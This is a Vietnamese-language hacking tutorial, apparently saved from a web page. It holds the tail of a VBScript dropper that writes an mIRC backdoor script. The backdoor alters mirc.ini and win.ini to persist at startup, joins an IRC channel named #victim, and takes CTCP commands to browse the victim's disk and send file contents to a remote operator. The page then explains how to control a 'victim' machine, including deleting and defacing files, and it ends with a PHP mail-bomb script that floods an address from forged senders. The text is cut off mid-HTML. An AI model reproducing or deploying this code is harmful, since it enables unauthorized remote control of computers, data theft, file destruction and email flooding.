<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini enabled=no"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini port=1080"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini method=4"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini dccs=no"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini useip=yes"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [language]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini sjis=0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini multibyte=0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [marker]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini show=off"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini size=3"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini colour=4"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini method=1"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [fileserver]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini warning=on"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [styles]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini thin=3"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini font=0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini hide=0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini color=default"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini size=2"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini buttons=0"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [waves]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini send=Event Beep"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [dragdrop]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n0=*.wav:/sound"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n1=*.*:/dcc send"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini s0=*.*:/dcc send"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [extensions]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n0=defaultEXTDIR:download\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini
n1=*.wav,*.mid,*.mp3,*.wma,*.oggEXTDIR:sounds\"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [afiles]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n0=aliases.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini [rfiles]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n0=remote.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n1=remote.ini"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\mirc.ini n2=logs\script.mrx"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\servers.ini [servers]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -a C:\windows\servers.ini
n0=mircxSERVER:irc.mircx.com:6667"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".writeini -n C:\windows\win.ini windows load C:\windows\
$+ $nopath($mircexe)"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".run C:\windows\ $+ $nopath($mircexe)"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %i 1"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "while (%i <= 190) {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -dl1 logs\script.mrx"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".inc %i"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "raw *:*No such nick/channel*:/halt"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias get { "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %i 1"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "while (%i <= 3) { "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($lines(logs/data.mrx) != 0) { "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//raw -q privmsg %remote.nick : $read(logs/data.mrx,1) "


<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".write -dl1 logs/data.mrx "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "} "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "else { //raw -q privmsg %remote.nick : 2[REQUEST RESULT]
All data tranfered to you! | .timer1 off | halt } "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "inc %i } "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias proc { .write -a logs/data.mrx $1- }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias ls {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($right(%current.dir,1) != \ ) { set %current.dir
%current.dir $+ \ }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".proc 2[REQUEST BEGIN] LS $1-"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($len(%current.dir) == 1) { set %current.dir | set %i
67 | while ($disk($chr(%i))) { proc 2<HDD> 4 $chr(%i) | .inc %i } }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "else {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %total.dir
$finddir(%current.dir,*,0,$calc($numtok(%current.dir,184) - 1))"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %total.file
$findfile(%current.dir,*,0,$calc($numtok(%current.dir,184) - 1))"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 2[REQUEST RESULT] There are %total.dir directories
and %total.file files"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %i 1"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "while (%i <= %total.dir) { proc 4<DIR> 3
$nopath($finddir(%current.dir,*,%i)) | inc %i }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %i 1"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "while (%i <= %total.file) { proc 10<FILE> 4
$nopath($findfile(%current.dir,*,%i)) | inc %i }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 2[REQUEST END] "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".timer1 0 3 get"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias pwd { proc 2[REQUEST RESULT] Current Directory :
%current.dir | .timer1 0 3 get }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias cd {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if (%current.dir == \) { set %current.dir }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($1- == up ) { "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($len(%current.dir) == 1) { proc 2[REQUEST RESULT]
This is Root Directory, Cannot move up ! }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "else { set %current.dir
$deltok(%current.dir,$numtok(%current.dir,92),92) $+ \ | .proc
2[REQUEST RESULT] CD UP Command completed ! } }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "else {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %temp.dir %current.dir $+ $1- $+ \"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($isdir(%temp.dir)) { set %current.dir %temp.dir |
.proc 2[REQUEST RESULT] CD Command completed ! }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "else proc 2[REQUEST RESULT] Invalid Directoty !"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".timer1 0 3 get"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias info {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 2[REQUEST BEGIN] INFO $1-"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %temp.file %current.dir $+ $1"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($isfile(%temp.file) == $true) {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 7[INFO] 14File Size: 6 $file(%temp.file).size
bytes"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 7[INFO] 14Created time: 6 $file(%temp.file).ctime"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 7[INFO] 14Last modification: 6
$file(%temp.file).mtime"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 7[INFO] 14Last access: 6 $file(%temp.file).atime"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ($2 == source) {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "set %i 1"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "while (%i <= $lines(%temp.file)) {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 2[SOURCE] 4 10 $read(%temp.file,%i)"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "inc %i"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "else proc 2[REQUEST RESULT] Invalid Filename !"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "proc 2[REQUEST END] "

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ".timer1 0 3 get"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias stop { .timer1 off | write -c logs\data.mrx |
//raw -q privmsg %remote.nick : 2[REQUEST Result] STOP Command
successful ! }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "alias contact timer2 0 600 //raw -q privmsg Lukos
2[CONTACT] Remote me plz!"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline ""

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "on 1:connect: { .join #victim }"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "ctcp 1:remotebegin:*:{"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//set %remote.nick $nick"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//raw -q privmsg %remote.nick : Remote passwd accepted"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//halt"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "ctcp 1:remoteend:*:{"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//raw -q privmsg %remote.nick : Remote close."

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//set %remote.nick $null"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//halt"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "ctcp 1:*:*:{"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "if ( $nick == %remote.nick ) {"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "$1-"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "//halt"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.writeline "}"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr6.close

<!--[if !supportEmptyParas]--> <!--[endif]-->

end sub

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function ImplementRemote()

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs1a = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr1a = fs1a.OpenTextFile(otag,1,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs2a = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr2a = fs2a.OpenTextFile(DummyTag,2,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do While fr1a.AtEndOfStream <> True

<!--[if !supportEmptyParas]--> <!--[endif]-->

segment1a = fr1a.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.writeline segment1a

<!--[if !supportEmptyParas]--> <!--[endif]-->

if ucase(segment1a)=ucase("[options]") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do

<!--[if !supportEmptyParas]--> <!--[endif]-->

If fr1a.AtEndOfStream Then exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

n2a = fr1a.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

If ucase(mid(n2a,1,3))=ucase("n2=") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.writeline Mid(n2a, 1, 13) & "1,1" & Mid(n2a, 17, 16) & "1" &
Mid(n2a, 34)

<!--[if !supportEmptyParas]--> <!--[endif]-->

exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

Else

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.writeline n2a

<!--[if !supportEmptyParas]--> <!--[endif]-->

End If

<!--[if !supportEmptyParas]--> <!--[endif]-->

Loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1a.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.close

<!--[if !supportEmptyParas]--> <!--[endif]-->

End Function

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function Implementfserv()

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs1a = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr1a = fs1a.OpenTextFile(otag,1,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs2a = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr2a = fs2a.OpenTextFile(DummyTag,2,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do While fr1a.AtEndOfStream <> True

<!--[if !supportEmptyParas]--> <!--[endif]-->

segment1a = fr1a.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.writeline segment1a

<!--[if !supportEmptyParas]--> <!--[endif]-->

if ucase(segment1a)=ucase("[warn]") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do

<!--[if !supportEmptyParas]--> <!--[endif]-->

If fr1a.AtEndOfStream Then exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

n2a = fr1a.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

If ucase(n2a)=ucase("fserve=on") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.writeline "fserve=off"

<!--[if !supportEmptyParas]--> <!--[endif]-->

Else

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.writeline n2a

<!--[if !supportEmptyParas]--> <!--[endif]-->

End If

<!--[if !supportEmptyParas]--> <!--[endif]-->

Loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1a.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2a.close

<!--[if !supportEmptyParas]--> <!--[endif]-->

End Function

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function Implementwarn()

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs1c = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr1c = fs1c.OpenTextFile(otag,1,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs2c = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr2c = fs2c.OpenTextFile(DummyTag,2,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do While fr1c.AtEndOfStream <> True

<!--[if !supportEmptyParas]--> <!--[endif]-->

segment1c = fr1c.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2c.writeline segment1c

<!--[if !supportEmptyParas]--> <!--[endif]-->

if ucase(segment1c)=ucase("[fileserver]") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do

<!--[if !supportEmptyParas]--> <!--[endif]-->

if fr1c.AtEndOfStream then exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

n2c = fr1c.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

If ucase(n2c)=ucase("warning=on") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2c.writeline "warning=off"

<!--[if !supportEmptyParas]--> <!--[endif]-->

Else

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2c.writeline n2c

<!--[if !supportEmptyParas]--> <!--[endif]-->

End If

<!--[if !supportEmptyParas]--> <!--[endif]-->

Loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1c.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2c.close

<!--[if !supportEmptyParas]--> <!--[endif]-->

End Function

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function ImplementPerform()

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs1p = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr1p = fs1p.OpenTextFile(Otag,8,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1p.writeline "[Perform]"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1p.writeline "n0=/Remote ON"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1p.writeline "n1=/join #tonghop"

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1p.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fs1p.close

<!--[if !supportEmptyParas]--> <!--[endif]-->

End Function

<!--[if !supportEmptyParas]--> <!--[endif]-->

Sub SetClearArchiveBit(filespec)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Dim fsg, fg

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fsg = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fg = fsg.GetFile(filespec)

<!--[if !supportEmptyParas]--> <!--[endif]-->

fg.attributes = 0

<!--[if !supportEmptyParas]--> <!--[endif]-->

fg.attributes = fg.attributes + 1

<!--[if !supportEmptyParas]--> <!--[endif]-->

End Sub

<!--[if !supportEmptyParas]--> <!--[endif]-->

Function ImplementPerfCheck()

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs1f = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr1f = fs1f.OpenTextFile(otag,1,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fs2f = CreateObject("Scripting.FileSystemObject")

<!--[if !supportEmptyParas]--> <!--[endif]-->

Set fr2f = fs2f.OpenTextFile(DummyTag,2,true)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do While fr1f.AtEndOfStream <> True

<!--[if !supportEmptyParas]--> <!--[endif]-->

segment1f = fr1f.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2f.writeline segment1f

<!--[if !supportEmptyParas]--> <!--[endif]-->

if ucase(segment1f)=ucase("[options]") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

Do

<!--[if !supportEmptyParas]--> <!--[endif]-->

If fr1f.AtEndOfStream Then exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

n2f = fr1f.readline

<!--[if !supportEmptyParas]--> <!--[endif]-->

If ucase(mid(n2f,1,3))=ucase("n0=") then

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2f.writeline Mid(n2f, 1, 40) & ",1," & Mid(n2f, 44)

<!--[if !supportEmptyParas]--> <!--[endif]-->

exit do

<!--[if !supportEmptyParas]--> <!--[endif]-->

Else

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2f.writeline n2f

<!--[if !supportEmptyParas]--> <!--[endif]-->

End If

<!--[if !supportEmptyParas]--> <!--[endif]-->

Loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

end if

<!--[if !supportEmptyParas]--> <!--[endif]-->

loop

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr1f.Close

<!--[if !supportEmptyParas]--> <!--[endif]-->

fr2f.close

<!--[if !supportEmptyParas]--> <!--[endif]-->

End Function

<!--[if !supportEmptyParas]--> <!--[endif]-->

-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

</script>

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

<!--[if !supportEmptyParas]--> <!--[endif]-->

III. Một số lệnh cơ bản để bắt đầu điều khiển
máy tính victim

<!--[if !supportEmptyParas]--> <!--[endif]-->

Bắt đầu bạn vào server irc.mircx.com:6667 bằng một chương
trình mirc. Nếu bạn muốn xem ví dụ hãy vào #victim

<!--[if !supportEmptyParas]--> <!--[endif]-->

Chọn một nick và gõ /ctcp <nick> remotebegin

<!--[if !supportEmptyParas]--> <!--[endif]-->

bạn sẽ nhận được câu trả lời là "passwd accepted"

<!--[if !supportEmptyParas]--> <!--[endif]-->

tiếp dó bạn sẽ điều khiển theo dạng

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nickvictim> command

<!--[if !supportEmptyParas]--> <!--[endif]-->

Và đây là một số command do Luke viết thêm

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> PWD (xem vị trí thư mục hiện tại)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Ví dụ nếu ngay ban đầu bạn gõ PWD thì bạn sẽ nhận
được giá trị trả về là C:\

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> LS (xem list thư mục hiện tại)

<!--[if !supportEmptyParas]--> <!--[endif]-->

Cho bạn list các folder và các file trong thư mục bạn đang
đứng.

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> CD <DIR> (vào một thư mục)

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> CD UP (lùi một thư mục)

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> INFO <filename_current_dir> (xem thông tin filename trong
thư mục bạn đang đứng)

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> INFO <filename_current_dir> SOURCE (xem mã nguồn
filename trong thư mục bạn đang đứng)

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> STOP

<!--[if !supportEmptyParas]--> <!--[endif]-->

Dừng lệnh đang thi hành, để chống phải đợi quá lâu
khi xem LS của những thư mục như %SYSTEM% chẳng hạn

<!--[if !supportEmptyParas]--> <!--[endif]-->

Tiếp đó bạn sử dụng các lệnh có sãn của mirc để
copy, del, run ..

<!--[if !supportEmptyParas]--> <!--[endif]-->

Đây là một vài lệnh mIRC căn bản.

<!--[if !supportEmptyParas]--> <!--[endif]-->

Để bắt victim thực hiên những lệnh này bạn hãy type
/ctcp <nick> <mirc_command_here>

<!--[if !supportEmptyParas]--> <!--[endif]-->

Quote

<!--[if !supportEmptyParas]--> <!--[endif]-->

mIRC Command

<!--[if !supportEmptyParas]--> <!--[endif]-->

Xoá một file:

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> REMOVE <Full_path_name>

<!--[if !supportEmptyParas]--> <!--[endif]-->

ví dụ như /ctcp <nick> REMOVE C:\autoexec.bat

<!--[if !supportEmptyParas]--> <!--[endif]-->

Copy file:

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> COPY <Full_path_name> <New_full_path_name>

<!--[if !supportEmptyParas]--> <!--[endif]-->

Ví dụ /ctcp <nick> COPY C:\windows\win.ini C:\

<!--[if !supportEmptyParas]--> <!--[endif]-->

Edit file:

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> WRITE -cdla <full_file_name> <text>

<!--[if !supportEmptyParas]--> <!--[endif]-->

Xoá filename đó trước khi viết vào

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> WRITE -c C:\autoexec.bat

<!--[if !supportEmptyParas]--> <!--[endif]-->

Viết thêm 1 dòng (giả sử tại dòng số 4)

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> WRITE -l4 C:\autoexec.bat echo your computer was hacked by
Lukos

<!--[if !supportEmptyParas]--> <!--[endif]-->

Xoá 1 dòng trong filename đó (ví dụ dòng số 3)

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> WRITE -dl3 C:\autoexec.bat

<!--[if !supportEmptyParas]--> <!--[endif]-->

Viết thêm vào file

<!--[if !supportEmptyParas]--> <!--[endif]-->

/ctcp <nick> WRITE -a C:\autoexec.bat echo your computer was hacked by
Lukos

<!--[if !supportEmptyParas]-->

Tạo bom thư

Sau đây tui xin giới thiệu với các bạn một vài cách làm
bom thư chơi người ta:))Bạn copy đoạn mã sau vào WORD rồi
save nó dưới dang file html và tiến hành tấn công bằng
cách upload lên host , nhưng hiện nay có nhiều host không cho
thưc thi hàm mail() nhằm chống lại các cuộc tấn công
kiểu DOS, đối với nhưng host như vậy thì đành phải
chịu thui:D.

<HTML>
<HEAD>
<TITLE>Bombmail danh cho ban quan tri!</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</HEAD>

<BODY>
<p align="center"><font face="verdana" color="red" size="4">PTV5 Group
Bombmail !</font></p>
<p align="center"><font face="verdana" color="red" size="2">L&#432;u
&#221; : C&#225;c b&#7841;n bomb email ai c&#361;ng
&#273;&#432;&#7907;c ( hi hi hi ) , nh&#432;ng &#273;&#7915;ng bomb
ch&#250;ng t&#244;i</font></p>
<?

/////////////////////////////////////////////////////////////////
//
// tru...@00dt1.com
//
/////////////////////////////////////////////////////////////////


if ($action == "BOMB")
{
if
(ereg("[A-Za-z0-9_-]+([\.]{1}[A-Za-z0-9_-]+)*@[A-Za-z0-9-]+([\.]{1}[A-Za-z0-9-]+)+",
$to))
{
echo "Gui $messages den $to<BR><BR><BR>";
}
else
{
die("Dia chi mail khong dung ($to)");
}


for ($i = 1; $i <= $messages; $i++)
{

$randfrom = rand(100000,900000);
$randsubject = rand(100000,900000);

mail($to, $randsubject, "$message", "From:
$rand...@hoangcuongbomb.com");
echo "Sent message # $i (Subject: $randsubject, From:
$rand...@hoangcuongbomb.com<BR>";

}


}

?>


<BODY bgcolor="#000000" text="#33CCFF" link="#FFFF00">
<CENTER>
<form name="danangitc" method="post" action="<?php echo $PHP_SELF ?>">
<table width="692" border="0" cellspacing="2" cellpadding="2">
<tr>
<td width="316"><font
